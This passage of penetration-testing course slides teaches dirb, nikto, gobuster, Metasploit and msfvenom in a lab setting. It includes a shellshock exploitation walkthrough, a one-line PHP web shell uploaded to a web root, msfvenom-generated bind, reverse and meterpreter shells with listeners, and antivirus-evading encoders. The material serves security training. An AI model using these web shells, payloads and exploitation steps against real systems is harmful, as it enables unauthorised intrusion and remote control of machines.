dictionary-based attack against a web server and
analyzing the response.
It comes with a set of preconfigured attack wordlists for
easy usage, but you can use your custom wordlists.
www.cybexer.com
157
DIRB - usage
'dirb' is a command-line tool. If you run it from Linux
terminal window without any options, it will display its
help
• dirb
www.cybexer.com
158
DIRB - usage
To scan the web server, provide its hostname or IP
address. Be sure you use full URL format with HTTP or
HTTPS scheme
• dirb http://srv.studentXX.csirt.crp/
www.cybexer.com
159
DIRB - usage
If target web server is located not on standard port 80
or 443, you can use http(s) scheme with port number
http://10.XX.32.5:8080/
If you want to scan specific folder of web target, you
can add folder name to URL
http://10.XX.32.5:8080/project/
www.cybexer.com
160
DIRB - usage
By default, 'dirb' uses its own medium size wordlist,
which is located at
'/usr/share/dirb/wordlists/common.txt'. This wordlist
has over 4500 lines of different words.
'dirb' has several wordlists,
'/usr/share/dirb/wordlists/big.txt' which is over 20000
lines and '/usr/share/dirb/wordlists/small.txt' with
900+ lines.
www.cybexer.com
161
DIRB - usage
To use several wordlists, append them (comma
separated) after hostname or IP address
• cd /usr/share/dirb/wordlists
• dirb http://10.XX.32.5/ ./small.txt,./big.txt
www.cybexer.com
162
DIRB - usage
By default, if 'dirb' finds a folder on the target web
server, it will apply same dictionary to that folder. And if
new folders will be found, 'dirb' will scan them again.
This default action is very noisy, but to limit search to
single folder, user '-r' option. This will not do recursive
crawling
• dirb http://10.XX.32.5/ -r
www.cybexer.com
163
DIRB - usage
There are might be situations where you need to
extract the files of a specific extension over the target
server. '-X' parameter followed by extension name(s)
will append it to wordlist
• dirb http://10.21.32.5/ -X .php,.pl,.txt
www.cybexer.com
164
DIRB - usage
If you need to scan target server with delay of each
request, add option '-z' followed by number of
milliseconds
• dirb http://10.XX.32.5/ -z 1356 -r
www.cybexer.com
165
DIRB - usage
For the purpose of better readability, and future
references, you can save the output of the 'dirb' scan to
the file. To do this, use the parameter '-o' followed by
file name where output will be saved.
• dirb http://10.XX.32.5/ -r -o output.txt
www.cybexer.com
166
DIRB - usage
To ignore listing files or folders with unnecessary HTTP
response code, use '-N' option followed by 3-digit
response code number
• dirb http://10.XX.32.5/ -r -N 403
www.cybexer.com
167
DIRB - usage
If target site uses HTTP basic authentication, user '-u'
option followed by column separated username and
password
• dirb http://10.XX.32.5/ -r -u user:pass
www.cybexer.com
168
DIRB - usage
Some web sites may serve different content based on
browser's User-Agent string. To change default UserAgent string, use '-a' option
• dirb http://10.XX.32.5/ -r -a 'Mozilla/5.0 (Linux;
Android 6.0.1; E6653 Build/32.2.A.0.253)
Chrome/52.0.2743.98'
www.cybexer.com
169
DIRB - usage
In some environments, access to web site might be only
through a proxy server. Option '-p' followed by proxy
server's IP address and port number, will send all
requests through that proxy.
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128
www.cybexer.com
170
DIRB - usage
If proxy server allows to access it only with username
and the password, add '-P' option followed by proxy
server credentials
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128 -P
proxy_user:proxy_pass
www.cybexer.com
171
NIKTO
NIKTO
NIKTO - web server vulnerability detector.
Advanced scanner to identify different weaknesses in
web server:
• Web server and software misconfigurations
• Default files and programs
• Insecure files and programs
• Outdated servers and programs
www.cybexer.com
173
NIKTO - usage
For basic scanning of web server, you have to supply its
IP address of hostname and port
• nikto -h 10.XX.32.5 -p 80
www.cybexer.com
174
NIKTO - usage
You can specify target site, by specifying it in URL
notation
• nikto -h http://10.XX.32.5/
www.cybexer.com
175
NIKTO - usage
For scanning HTTPS web server, you have to supply its
IP address of hostname, port and use '-ssl' option
• nikto -h 10.XX.32.4 -p 443 -ssl
www.cybexer.com
176
NIKTO - usage
To scan several ports, write them comma-separated
after '-p' option.
• nikto -h 10.XX.32.5 -p 80,8080,8081
www.cybexer.com
177
NIKTO - usage
By default, 'nikto' uses User-Agent specified in the
configuration file '/etc/nikto.conf'
• grep -A 5 -B5 USERAGENT /etc/nikto.conf
www.cybexer.com
178
NIKTO - usage
Some IDS systems may block access to the sites with
default settings (to minimize hacks by script-kiddies).
'nikto' allows to change its User-Agent by setting 'useragent' option followed by custom name
• nikto -h http://10.XX.32.5/ -useragent "IOS 5.0,
iPad 2022 generation"
www.cybexer.com
179
GOBUSTER
GOBUSTER - installation
Kali Linux has 'gobuster' software in its repository. To
install it, run following command in your terminal
• apt-get install gobuster
www.cybexer.com
181
GOBUSTER - usage
To scan target web server, you have to specify URL for
hostname and path to the dictionary file
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3small.txt
www.cybexer.com
182
GOBUSTER - usage
If you need to filter certain HTTP response codes, use 's' options followed by code number (can be comaseparated)
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3small.txt -s 200,401,403
www.cybexer.com
183
GOBUSTER - usage
Similar to 'nikto', 'gobuster' uses its own User-Agent
string 'gobuster/3.1.0'. To change it, use '-a' option
followed by custom User-Agent string
• gobuster dir -u http://10.XX.32.5/ -w
/usr/share/dirbuster/wordlists/directory-list-2.3small.txt -a "Firefox 3.0"
www.cybexer.com
184
GOBUSTER - usage
In addition to web server scanning, 'gobuster' can run
DNS enumeration. To scan for DNS subdomains, you
need to supply domain name and path to dictionary file
• gobuster dns -d cnn.com -w
/usr/share/dnsenum/dns.txt
www.cybexer.com
185
Metasploit
Metasploit - intro
Metasploit is extremely robust and flexible penetration
testing framework and has tons of tools to perform
various simple and complex tasks.
www.cybexer.com
187
Metasploit - intro
Metasploit has various components which are located
in different categories
www.cybexer.com
188
Metasploit - intro
Auxiliaries - piece of code specifically written to perform a
task.
Some examples of auxiliaries:
auxiliary/admin/http/tomcat_administration - scans a
range of IP addresses and locates the Tomcat Server
administration panel and version
auxiliary/scanner/mysql/mysql_login - brute-force login
tool for MySQL servers
auxiliary/scanner/http/open_proxy - scan for open HTTP
proxies
www.cybexer.com
189
Metasploit - intro
Exploits - actual code that will execute on the target
system to take advantage of vulnerability.
Some examples of exploits:
windows/smb/ms17_010_eternalblue - ETERNALBLUE
exploit
unix/webapp/drupal_drupalgeddon2 - exploit for
Drupal CMS
www.cybexer.com
190
Metasploit - intro
Payloads - is the action that needs to be performed
after the execution of an exploit.
Some examples of payloads:
payload/generic/shell_reverse_tcp - generic reverse
TCP command shell
payload/php/reverse_php - reverse TCP PHP command
shell
www.cybexer.com
191
Metasploit - intro
Encoders - various techniques and algorithms to
obfuscate the payload in a way it does not get detected
by antivirus software.
Some examples of encoders:
encoder/cmd/powershell_base64 - Powershell Base64
command encoder
encoder/cmd/perl - Perl command encoder
www.cybexer.com
192
Metasploit - intro
POST (post-exploitation activities) - further infiltration
modules, which are used after successful exploitation.
Some examples of encoders:
post/linux/gather/enum_users_history - gather Linux
user history
post/windows/manage/install_ssh - install OpenSSH
on Winidows
www.cybexer.com
193
Metasploit - usage
Since Metasploit relies on Postgres database, before
first run, Metasploit must be configured for database
• msfdb init
www.cybexer.com
194
Metasploit - usage
If Metasploit already configured, then initialization
script will inform that
• msfdb init
www.cybexer.com
195
Metasploit - usage
Let's start Metasploit
• msfconsole
www.cybexer.com
196
Metasploit - usage
It is important to keep Metasploit up-to-date. Check
the version in MSF console
• version
www.cybexer.com
197
Metasploit - usage
Check the database connectivity in MSF console
• db_status
If database is not started, 'db_status' command will
show following output
To start Postgres SQL database, run following command
in Linux terminal
• service postgresql start
www.cybexer.com
198
Metasploit - usage
To list content of each category
• show encoders
www.cybexer.com
199
Metasploit - usage
Search for specific exploit/encoder/auxiliary etc.
• search ftp
www.cybexer.com
200
Metasploit - usage
To get more precise search results, use better search
query
• search windows printer
www.cybexer.com
201
Metasploit - usage
Metasploit is very powerful tool for various attack phases information gathering, scanning, exploitation and postexploitation.
Information gathering is the first and one of the most, if
not the most, important activities in penetration testing.
This step is carried out in order to find out as much
information about the target machine as possible.
The more information we have, the better our chances will
be for exploiting the target.
www.cybexer.com
202
Metasploit - usage
There are two types of techniques used in information
gathering
Passive information gathering - is used to gain
information about the target, without having any
physical connectivity or access to it.
Active information gathering - logical connection is set
up with the target in order to gain information.
www.cybexer.com
203
Metasploit - usage
Let's do our first information gathering task.
Since DNS is one of most important protocols in
internet, we will do DNS record scanning and
enumeration.
DNS enumeration is a passive information gathering.
www.cybexer.com
204
Metasploit - usage
To run 'auxiliary' module in MSF console, we use the
'use' command followed by the module name.
In MSF console switch to auxiliary module 'enum_dns'
• use auxiliary/gather/enum_dns
www.cybexer.com
205
Metasploit - usage
To display various information about the module, use
'info' command
• info
www.cybexer.com
206
Metasploit - usage
To show only module specific options, use following
command in MSF console
• show options
www.cybexer.com
207
Metasploit - usage
Module options has following columns:
Name - name of variable
Current Setting - value of variable
Required - is variable required or not. If required
variable is not set and module executed, then error will
be shown
Description - description of variable
www.cybexer.com
208
Metasploit - usage
We can see, that 'DOMAIN' variable is required, but set
empty. Let's set some domain name to that variable
• set DOMAIN zonetransfer.me
Now if we run 'show options' again, we will see correct
DOMAIN variable
• show options
www.cybexer.com
209
Metasploit - usage
Depends on environment and security rules, you might
have to set custom DNS server.
• set NS 10.103.176.2
www.cybexer.com
210
Metasploit - usage
Now we can run our DNS enumeration against
'zonetransfer.me' domain. In MSF console type 'run'
and hit 'Enter'
• run
www.cybexer.com
211
Metasploit - usage
Now, let's examine results of DNS enumeration of
'zonetransfer.me' domain
Note. Instead of 'run' command you can use 'exploit', it
is an alias, but looks cooler :)
www.cybexer.com
212
Metasploit - usage
Next is active information gathering with Metasploit.
MSF has several port scanner modules. Let's see what
port scanning modules MSF has
• search portscan
www.cybexer.com
213
Metasploit - usage
We start with simple SYN port scanning
• use auxiliary/scanner/portscan/syn
www.cybexer.com
214
Metasploit - usage
Let's see what options are required for port scanning.
Type following command MSF console
• show options
www.cybexer.com
215
Metasploit - usage
As we can see, the only required option for port
scanning which is empty is 'RHOSTS'. RHOSTS stands for
remote hosts. RHOSTS can be single IP address, range
of IP addresses, a hostname or CIDR identifier
• set RHOSTS 10.XX.32.5
To make port scanning run a bit faster, let's lower the
port range to 100 ports
• set PORTS 1-100
www.cybexer.com
216
Metasploit - usage
After target is set and port range adjusted, we can start
scanning with 'run' command
• run
www.cybexer.com
217
Metasploit - usage
Auxiliary port scanning modules 'scanner/portscan' use
MSF built-in functions. They are not very efficient and
powerful comparing to 'nmap'. MSF allows to scan
targets using native 'nmap' with all its rich functionality.
Syntax for running 'nmap' from Metasploit is exactly
the same as you would run 'nmap' from Linux
command line.
www.cybexer.com
218
Metasploit - usage
Exploiting targets is done in this way
- select exploit you want to use
- set required options
- run exploit against the target
www.cybexer.com
219
Metasploit - usage
Search Metasploit database for required exploit. In our
case, we need to search for 'shellshock'. In 'msfconsole'
prompt run following command
• search shellshock
www.cybexer.com
220
Metasploit - usage
Since we do not know that target is vulnerable to
'shellshock' exploit, we have to test it. Let's select that
exploit
• use
exploit/multi/http/apache_mod_cgi_bash_env_exe
c
www.cybexer.com
221
Metasploit - usage
Since each exploit can have several required options,
lets check them
• show options
www.cybexer.com
222
Metasploit - usage
From list of options, we can see that options 'RHOSTS'
and 'TARGETURI' are required, but not set. Let's set
those options
• set rhosts 10.XX.32.3
• set targeturi /cgi-bin/test.sh
www.cybexer.com
223
Metasploit - usage
It's advised to verify options again before running the
exploit against the target
• show options
www.cybexer.com
224
Metasploit - usage
Before actual exploitation, you can check if target is
vulnerable to selected exploit
• check
www.cybexer.com
225
Metasploit - usage
After all options are set and verified, you can run the
exploit
• exploit -j
www.cybexer.com
226
Metasploit - usage
To list active/established sessions, type in following
command
• sessions -l
www.cybexer.com
227
Metasploit - usage
To start interacting with active session use following
command (be sure to pick correct session number)
• sessions -i 1
www.cybexer.com
228
Metasploit - usage
To display 'meterpreter' help commands type following
• help
www.cybexer.com
229
Metasploit - usage
In active 'meterpreter' session you can run simple
systems commands
cat
cp
mkdir
mv
rm
etc.
www.cybexer.com
230
Metasploit - usage
Since we already know, that target machine is running
Linux operating system, lets switch from 'meterpreter'
shell to Linux command shell
• shell
www.cybexer.com
231
Metasploit - usage
To exit remote shell type 'exit' to quit it
• exit
www.cybexer.com
232
Metasploit - usage
Once you have entered 'meterpreter' session, you can
upload new exploits/backdoors/files to remote
machine.
Open new Kali Linux terminal and type following
command
• echo '<?php system($_GET[c]);?>' > /tmp/file.php
www.cybexer.com
233
Metasploit - usage
In active 'meterpreter' sessions upload new file to
specified remote location
• upload /tmp/file.php /var/www/html/file.php
Now access new file from your browser and add '?c=id'
to parameter
www.cybexer.com
234
Metasploit - usage
In 'meterpreter' prompt type 'exit' to quit it.
This command will shutdown active session.
www.cybexer.com
235
Metasploit - usage
To exit meterpreter shell, but keep session running,
type following command:
• bg
www.cybexer.com
236
Metasploit - usage
We also know, that remote target might have
vulnerable services.
Try to exploit them!
www.cybexer.com
237
Msfvenom
MSFvenom
Msfvenom is a standalone payload generator.
Msfvenom is a combination of Msfpayload and
Msfencode, putting both of these tools into a single
Framework making it as go to tool for generating
and encoding payload(s) for different uses.
www.cybexer.com
239
MSFvenom
In Kali we can list all msfvenom functionality by
simply running following command
• msfvenom
www.cybexer.com
240
MSFvenom
Supported platform list:
•
•
•
•
•
•
•
•
•
•
•
•
Cisco
OSX
Solaris
BSD
OpenBSD
hardware
Firefox
BSDi
NetBSD
NodeJS
FreeBSD
Python
www.cybexer.com
•
•
•
•
•
•
•
•
•
•
•
•
•
•
AIX
JavaScript
HPUX
PHP
Irix
Unix
Linux
Ruby
Java
Android
Netware
Windows
mainframe
multi
241
MSFvenom
Msfvenom has different modules for specific
actions. To list all available payloads, type following
command in your Kali terminal:
• msfvenom -l payloads
www.cybexer.com
242
MSFvenom
Listing other modules
• msfvenom -l encoders
• msfvenom -l archs
• msfvenom -l platforms
• msfvenom -l encrypt
www.cybexer.com
243
MSFvenom
Once specific payload is chosen, you can list its
options
• msfvenom -p php/meterpreter/bind_tcp --listoptions
www.cybexer.com
244
MSFvenom
Before generating desired payload, it's important to
pay attention to required options
www.cybexer.com
245
MSFvenom
For customized payload generation, you might want
to adjust advanced options
www.cybexer.com
246
MSFvenom
Before generating your first payload, you must
know following
• type of payload
Will the payload be executed on Linux or Windows
operating system?
What architecture is used on target machine?
Will payload be .exe, ELF, PHP, Java or PowerShell?
To what IP address and port payload will connect?
www.cybexer.com
247
MSFvenom
Let's generate our first payload.
Payload will be executed on Linux operating system.
Payload will be an executable file (ELF).
Payload will be running on 64-bit system.
Listening IP address will be - 127.0.0.1
Listening port will be - 4567
www.cybexer.com
248
MSFvenom
Let's check what payload options must be set
• msfvenom -p generic/shell_bind_tcp --listoptions
www.cybexer.com
249
MSFvenom
To generate the payload, type following command
in your Kali terminal
• msfvenom -p generic/shell_bind_tcp
LPORT=4567 -a x64 -f elf --platform Linux -o
/tmp/shell01
www.cybexer.com
250
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell01
Check generated payload
• ls -la /tmp/shell01
Check file type
• file /tmp/shell01
www.cybexer.com
251
MSFvenom
Execute the shellcode
• /tmp/shell01
You will not see anything after execution.
www.cybexer.com
252
MSFvenom
Open new Kali terminal window and type following
command
• nc localhost 4567
You will not see any prompt or output.
Just type any Linux command
www.cybexer.com
253
MSFvenom
Now we generate new, reverse shell
• msfvenom -p linux/x64/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=5678 -f elf -o
/tmp/shell02
www.cybexer.com
254
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell02
Check generated payload
• ls -la /tmp/shell02
Check file type
• file /tmp/shell02
www.cybexer.com
255
MSFvenom
Since we generated the reverse shell, once the shell
is executed, it will connect to listening IP address
and port specified with LHOST and LPORT options.
In new Kali terminal window type following
command
• nc -lvp 5678
www.cybexer.com
256
MSFvenom
Now we can execute our second shell. In Kali
terminal window type following (keep nc running in
another terminal window)
• /tmp/shell02
If reverse connection was established, you should
see following text in you "nc" terminal window
www.cybexer.com
257
MSFvenom
Now you can run Linux commands
www.cybexer.com
258
MSFvenom
Meterpreter shell
The Meterpreter (short for meta-interpreter) shell, a special type
of shell, is the bread and butter of Metasploit. It can be added as
a payload that is either a bind shell or reverse shell. The
Meterpreter is one of the advanced payloads available with the
MSF, but you should not look at it as just a payload. Rather one
should view it as an exploit platform that is executed on the
remote system. It has its own command shell, which provides
the attacker with a wide variety of activities that can be executed
on the exploited system.
www.cybexer.com
259
MSFvenom
Let's generate meterpreter reverse shell.
First, we have to check what options must be set
before shellcode generation
• msfvenom -p
linux/x64/meterpreter/reverse_tcp --list-options
www.cybexer.com
260
MSFvenom
Type following command in your Kali terminal
• msfvenom -p
linux/x64/meterpreter/reverse_tcp
LHOST=127.0.0.1 LPORT=6789 -f elf -o
/tmp/shell03
www.cybexer.com
261
MSFvenom
Set executable bit for the file
• chmod a+x /tmp/shell03
Check generated payload
• ls -la /tmp/shell03
Check file type
• file /tmp/shell03
www.cybexer.com
262
MSFvenom
Next step is to run a Metasploit console with a
handler. Type following command in Kali
terminal
• msfconsole
www.cybexer.com
263
MSFvenom
Now let's configure a handler. In Metasploit type
following commands
• use exploit/multi/handler
www.cybexer.com
264
MSFvenom
Before running stager, we have to see what
options must be configured
• show options
www.cybexer.com
265
MSFvenom
Now we have to set option identical to our
shellcode options - port and payload
• set payload
linux/x64/meterpreter/reverse_tcp
• set LHOST 127.0.0.1
• set LPORT 6789
www.cybexer.com
266
MSFvenom
Before executing the handler, it is wise to recheck stager's settings
• show options
www.cybexer.com
267
MSFvenom
Once everything is correct, we can execute the
handler. Type following command in Metasploit
• run -j
www.cybexer.com
268
MSFvenom
Final step is to launch shellcode in Kali terminal
• /tmp/shell03
If shellcode was able to connect to handler, then
following message will appear in Metasploit
window
www.cybexer.com
269
MSFvenom
Let's see available sessions in Metasploit. Type
following command
• sessions -l
www.cybexer.com
270
MSFvenom
To start interacting with available session, type
following command (be sure to use correct
session ID number)
• sessions -i 1
www.cybexer.com
271
MSFvenom
Meterpreter allows to run built-in system
commands or run native shell of the remote
system. To see full list of available options, type
following command in Metasploit
• help
www.cybexer.com
272